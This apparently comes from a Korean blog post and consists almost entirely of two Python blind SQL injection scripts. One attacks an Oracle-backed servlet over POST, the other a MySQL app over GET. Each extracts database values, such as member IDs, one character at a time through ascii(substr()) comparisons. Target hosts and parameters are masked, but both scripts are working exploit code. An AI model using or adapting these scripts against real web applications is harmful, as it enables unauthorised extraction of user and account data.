post + oracle + python2
import requests
cookies = {'xxID':'XXXXX.XXXXX_servlet_XXXXX'}
headers = {'Content-Type':'application/x-www-form-urlencoded', }
for k in range(22,25):
for i in range(1,15):
for j in range(48, 122):
data = {'tranxx': 'L', 'blm': 'com.xxx.xxBoard', 'xxx_num': '1', 'url': '/xxx/xx.jsp', 'page': '1', 'xx_category': 'xxx', 'xx_seq': '', 'xx_pagexxx': 'nimda', 'xx_xxbun': '', 'xxx': '1', 'xxx_x': '1%\' and \'1\'=\'1\' and (ascii(substr((select xxx_ID from (select rownum rn, xx_ID from xx_x_MEMBER) where rn='+str(k)+'),'+str(i)+',1))='+str(j)+')--'}
res = requests.post('hxxp://xx.com/xx/xx.xx.PresentationController', data=data, cookies=cookies, headers=headers)
if res.text.find('tag') != -1:
print(chr(j), end='')
break
print('\n');
get + mysql + python3
import urllib.request
url = "hxxp://localhost/xxx"
req = urllib.request.Request(url)
res = urllib.request.urlopen(req)
session_id = res.headers.get("Set-Cookie")
for i in range(1,6):
for j in range(48, 122):
req = urllib.request.Request(url+"?x=home&x=1&x=xx&xid=x1&xort=(select%201%20from%20xx_xxx_xxx%20where%20(ascii(substr((SELECT%20xx%20FROM%20x_xx_xxx%20limit%202,1),"+str(i)+",1))="+str(j)+"))&xxxxx=&xxxxx=1&&where=xx&keyword=xxx")
req.add_header("cookie", session_id)
res = urllib.request.urlopen(req)
if not res.read().decode().find("tag") != -1:
print(chr(j), end='')
break
'웹' 카테고리의 다른 글
| [SQL Injection] mssql (0) | 2018.03.20 |
|---|